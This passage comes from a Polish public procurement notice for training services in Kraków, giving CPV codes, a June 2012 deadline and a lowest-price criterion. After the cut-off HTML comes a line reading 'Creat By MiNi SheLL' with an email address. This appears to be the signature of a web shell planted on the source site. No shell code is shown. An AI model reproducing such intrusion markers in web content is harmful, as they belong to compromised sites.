Zamawiający udostępni bezpłatnie sale wykładowe, wyposażone w standardowe stanowiska komputerowe, w godzinach, w których nie są wykorzystywane do prowadzenia zajęć szkolnych, lub Wykonawca zapewni własną bazę technodydaktyczną z siedzibą w Krakowie, właściwą do zrealizowania przedmiotu umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com